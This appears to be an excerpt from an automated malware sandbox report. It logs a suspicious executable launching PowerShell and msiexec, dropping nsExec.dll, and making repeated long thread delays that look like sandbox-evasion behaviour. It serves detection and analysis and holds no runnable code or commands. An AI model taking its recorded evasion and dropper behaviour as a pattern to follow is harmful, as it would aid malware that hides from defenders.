Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599510	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599404	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598486	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597606	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597497	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596808	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6676			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3026			Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612	Thread sleep count: 2627 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599510s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612	Thread sleep count: 7195 > 30	Jump to behavior
